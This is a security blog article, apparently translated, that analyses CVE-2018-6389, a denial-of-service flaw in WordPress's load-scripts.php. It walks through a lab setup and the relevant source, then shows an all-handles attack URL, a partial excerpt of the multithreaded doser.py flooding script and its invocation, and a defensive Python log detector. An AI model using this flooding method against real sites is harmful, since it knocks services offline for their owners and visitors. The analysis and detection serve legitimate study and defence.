Wordpress Threats

Pressing WordPress. How the new method of “putting” sites on WordPress works

Tom Grant
Last updated: 10 October

Article content

  • Stand
  • Vulnerability details
  • Automate it
  • Vulnerability demonstration (video)
  • Conclusions
In WordPress, the most popular CMS in the world, a bug was found that lets an attacker cause a denial of service (DoS) of a site. Exploitation is easy, works remotely, and requires no rights in the system. The flaw was discovered by Israeli researcher Barak Tawily, aka Quitten, while he was looking into another WordPress project. The vulnerability has been assigned the identifier CVE-2018-6389 and is present on thousands of sites around the world, because the WordPress developers have been slow to acknowledge the seriousness of the problem and fix it. As a result, even the most recent CMS version at the time of writing, 4.9.5, was not spared. So let's take a closer look at the vulnerability, and then you can decide for yourself how terrible the devil is.

Stand

I have already set up a WordPress test bench several times to write about other vulnerabilities, so I will quickly go over the main steps without going into detail. By tradition, we use a Docker container with Debian, PHP 7 and Apache.

    $ docker run -it --rm -p80:80 --name=wpdos --hostname=wpdos debian /bin/bash
    $ apt-get update && apt-get install -y mysql-server apache2 php php7.0-mysqli nano wget

Download and extract WordPress 4.9.5:

    $ cd /tmp && wget https://wordpress.org/wordpress-4.9.5.tar.gz
    $ tar xzf wordpress-4.9.5.tar.gz
    $ rm -rf /var/www/html/ && mv wordpress/ /var/www/html/
    $ chown -R www-data:www-data /var/www/html/

Start the necessary services and create the database:

    $ service mysql start && service apache2 start
    $ mysql -u root -e "CREATE DATABASE wpdos; GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' IDENTIFIED BY 'megapass';"

The next step is to install the CMS through the browser.

[Screenshot: WordPress installation]

Vulnerability details

So, Tawily, while browsing another WordPress site, noticed the script load-scripts.php. It is used to serve JavaScript: the names of the files to load are passed in the load parameter, and their contents are concatenated in the output. This was done to speed up page loading and reduce the number of requests to the server: for the browser to receive all the JS files needed to render a page correctly, a single request to load-scripts.php listing all the required JavaScript files is enough. This is a fairly common practice in backend development. The script load-styles.php has the same logic, only for CSS files.

Let's look at the source code of load-scripts.php. File names are separated by commas.

/wp-admin/load-scripts.php
    $load = $_GET['load'];
    if ( is_array( $load ) )
        $load = implode( '', $load );

    $load = preg_replace( '/[^a-z0-9,_-]+/i', '', $load );
    $load = array_unique( explode( ',', $load ) );

What scripts can we load? Of course, you cannot read an arbitrary file: there is a clearly defined list of allowed objects.

/wp-admin/load-scripts.php
    foreach ( $load as $handle ) {
        if ( !array_key_exists($handle, $wp_scripts->registered) )
            continue;

        $path = ABSPATH . $wp_scripts->registered[$handle]->src;
        $out .= get_file($path) . "\n";
    }

This list lives in the registered property of the WP_Scripts class and is filled by the function wp_default_scripts from the file script-loader.php.

/wp-admin/load-scripts.php
    $wp_scripts = new WP_Scripts;
    wp_default_scripts($wp_scripts);

/wp-includes/script-loader.php
    /**
     * Register all WordPress scripts.
     ...
     * @param WP_Scripts $scripts WP_Scripts object.
     */
    function wp_default_scripts( &$scripts ) {

The list of files allowed for loading is populated with the add method.

/wp-includes/script-loader.php
    function wp_default_scripts( &$scripts ) {
        ...
        $scripts->add( 'wp-a11y', "/wp-includes/js/wp-a11y$suffix.js", array( 'jquery' ), false, 1 );

        $scripts->add( 'sack', "/wp-includes/js/tw-sack$suffix.js", array(), '1.6.1', 1 );
        ...
        $scripts->add( 'editor', "/wp-admin/js/editor$suffix.js", array('utils','jquery'), false, 1 );
        ...

The call parameters specify the name (handle) of the element, the path to the file, dependencies on other elements, the version, and so on.

/wp-includes/class.wp-scripts.php
    class WP_Scripts extends WP_Dependencies {

/wp-includes/class.wp-dependencies.php
    public function add( $handle, $src, $deps = array(), $ver = false, $args = null ) {
        if ( isset($this->registered[$handle]) )
            return false;
        $this->registered[$handle] = new _WP_Dependency( $handle, $src, $deps, $ver, $args );
        return true;
    }

The complete list of add calls for loadable items can be found in script-loader.php. There are 181 of them in total. Minified versions of the scripts are loaded by default.

/wp-includes/script-loader.php
    $suffix = SCRIPT_DEBUG ? '' : '.min';
    $dev_suffix = $develop_src ? '' : '.min';

[Screenshot: loading utils.min.js via load-scripts.php]

The idea is to read all possible JS files in one request. The resulting request is monstrous, so I will not quote it in full; in place of the ellipsis at the end there should be about 170 more file names.

    http://wpdos.visualhack/wp-admin/load-scripts.php?load=utils,common,wp-a11y,sack,quicktags,colorpicker,editor,wp-fullscreen-stub,wp-ajax-response,wp-api-request,wp-pointer...

The time from sending the request to receiving the first byte of the response is about 500 milliseconds, which is roughly how long the server spends processing this one request.

[Screenshot: loading all JS files at once via a request to load-scripts.php]

Each file is read separately with file_get_contents.

/wp-admin/includes/noop.php
    function get_file( $path ) {

        if ( function_exists('realpath') ) {
            $path = realpath( $path );
        }

        if ( ! $path || ! @is_file( $path ) ) {
            return '';
        }

        return @file_get_contents( $path );
    }

So each such request causes 181 I/O operations, and if there are many such requests, the server may soon start having problems. This is especially true for sites on shared hosting.

Automate it

Now let's organize multiple requests to that URL. For this, Tawily used a self-written utility called doser, which sends requests to the server in a specified number of threads. The script is written in Python 2.7 using the requests and threading libraries. Invoking it is simple:

    $ python doser.py -g 'http://wpdos.visualhack/wp-admin/load-scripts.php?load=utils,common,wp-a11y,...' -t 999

The -g switch says that requests must be sent with the GET method, and -t sets the number of threads.

doser.py
    def sendGET(url):
        ...
        try:
            request_counter+=1
            request = requests.get(url, headers=headers)
        ...
        while True:
            global url
            sendGET(url)
    ...
    def main(argv):
        ...
        parser.add_argument('-g', help='Specify GET request. Usage: -g <url>')
        ...
        parser.add_argument('-t', help='Specify number of threads to be used', default=500, type=int)
        ...
        for i in range(args.t):
            t = SendGETThread
            ...

Perhaps it is not the fastest or most optimal solution, but the script does its job honestly and copes with the task. After two thousand requests our simple server is no longer available to the average user.

[Screenshot: successfully carried out DoS attack]

To add a little more load, you can additionally send requests for CSS files via load-styles.php.

Vulnerability demonstration (video)

[Video: vulnerability demonstration]
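The $load handling in load-scripts.php described in the vulnerability details, and the request pattern that the doser run produces, as an added Python example that is not part of the original article, of doser, or of WordPress: it models how the load parameter is sanitized, split and filtered against the registered handle table (including the load[] array form, which PHP implodes with an empty separator), and then runs a small detector over constructed Apache access-log lines that flags clients asking for an abnormal number of handles in one request or hammering load-scripts.php. The REGISTERED table is a constructed 16-handle subset standing in for the 181 real handles, the log lines and IP addresses are made up, and the thresholds are assumptions to tune per site.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed subset of the handles wp_default_scripts() registers in
# $wp_scripts->registered. WordPress 4.9.5 has 181; 16 show the mechanics.
REGISTERED = frozenset([
    "utils", "common", "wp-a11y", "sack", "quicktags", "colorpicker", "editor",
    "wp-fullscreen-stub", "wp-ajax-response", "wp-api-request", "wp-pointer",
    "jquery", "jquery-core", "jquery-migrate", "underscore", "backbone",
])

# Same character class as preg_replace('/[^a-z0-9,_-]+/i', '', $load).
SANITIZE = re.compile(r"[^a-z0-9,_-]+", re.IGNORECASE)


def resolve_handles(load):
    """Model of the $load handling in /wp-admin/load-scripts.php.

    load is a string (load=a,b,c) or a list (load[]=a&load[]=b); PHP implodes
    a list with an empty separator, so 'utils' and 'common' fuse into
    'utilscommon'. The string is stripped to [a-z0-9,_-], split on commas,
    de-duplicated keeping the first occurrence, and only handles present in
    the registered table cause a get_file() read.
    """
    if isinstance(load, (list, tuple)):
        load = "".join(load)
    load = SANITIZE.sub("", load or "")
    seen, handles = set(), []
    for handle in load.split(","):
        if handle and handle not in seen:
            seen.add(handle)
            handles.append(handle)
    return [h for h in handles if h in REGISTERED]


def file_reads_for_request(target):
    """Return (script_name, number_of_files_read) for one request target.

    load-styles.php runs the same pipeline against $wp_styles->registered;
    it is modelled here against the single REGISTERED table for brevity.
    """
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    if script not in ("load-scripts.php", "load-styles.php"):
        return script, 0
    query = parse_qs(parts.query, keep_blank_values=True)
    if "load[]" in query:
        handles = resolve_handles(query["load[]"])
    else:
        handles = resolve_handles(query.get("load", [""])[0])
    return script, len(handles)


# Combined log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def detect_load_script_abuse(log_lines, max_handles=10, max_requests=50):
    """Flag clients that name more than max_handles registered handles in one
    load-scripts.php / load-styles.php request, or send more than max_requests
    such requests within the log window. A normal page load asks for a few
    handles; the CVE-2018-6389 PoC asks for all of them, over and over.
    Returns {ip: [reason, ...]} for offending clients only.
    """
    requests_per_ip = Counter()
    max_handles_per_ip = defaultdict(int)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        _script, reads = file_reads_for_request(m["target"])
        if reads == 0:  # not a load-* request, or no registered handle asked for
            continue
        ip = m["ip"]
        requests_per_ip[ip] += 1
        max_handles_per_ip[ip] = max(max_handles_per_ip[ip], reads)

    findings = {}
    for ip, count in requests_per_ip.items():
        reasons = []
        if max_handles_per_ip[ip] > max_handles:
            reasons.append(f"{max_handles_per_ip[ip]} handles in one request")
        if count > max_requests:
            reasons.append(f"{count} load-* requests in window")
        if reasons:
            findings[ip] = reasons
    return findings


# Constructed access-log sample: one normal visitor and one client replaying
# the all-handles URL 60 times (IPs are RFC 5737 documentation addresses).
ALL_HANDLES = ",".join(sorted(REGISTERED))
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Apr/2018:12:00:01 +0000] "GET /wp-admin/load-scripts.php?load=utils,common,wp-a11y HTTP/1.1" 200 61234',
    '203.0.113.7 - - [10/Apr/2018:12:00:02 +0000] "GET /wp-admin/load-scripts.php?load=../../etc/passwd HTTP/1.1" 200 1',
    '203.0.113.7 - - [10/Apr/2018:12:00:03 +0000] "GET /index.php?p=1 HTTP/1.1" 200 8120',
] + [
    f'198.51.100.9 - - [10/Apr/2018:12:01:{i:02d} +0000] '
    f'"GET /wp-admin/load-scripts.php?load={ALL_HANDLES} HTTP/1.1" 200 312000'
    for i in range(60)
]

if __name__ == "__main__":
    for ip, reasons in detect_load_script_abuse(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

Two details worth noticing from the model: the sanitizing regex means path tricks like ../../etc/passwd collapse to a harmless non-registered handle (this is purely a resource-exhaustion bug, not a file read), and the load[] array form is only useful to an attacker if the fragments carry their own commas. A cap on the number of handles per request, which is what the max_handles threshold emulates on the detection side, is the kind of cheap server-side fix the conclusions below ask for.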

Conclusions

Here is a rather non-standard attack vector. Of course, its impact is not too serious, otherwise we would already have observed mass outages. A properly configured dedicated server should not suffer from such a trick. But shared hosting imposes limits on consumed resources, and once they are exhausted, problems may arise. During testing on one of my own sites, the hoster spammed my mailbox with messages about exceeding the allocated limits.

Why doesn't WordPress consider this a problem and take the time to fix it? On the one hand, the developers can be understood: they are not responsible for their CMS being run on weak or misconfigured servers (and WordPress is far from the lightest CMS). But this is not at all what you want to hear from the developers of the system your blog runs on. The problem will have to be fixed anyway, and I am sure there are plenty of harmless ways to do it. After all, it has already been assigned a CVE!

Source : xaker.ru

TAGGED: DoS, PoC, Source code, WordPress
Tom Grant. Published October 31, 2021; updated October 10, 2022.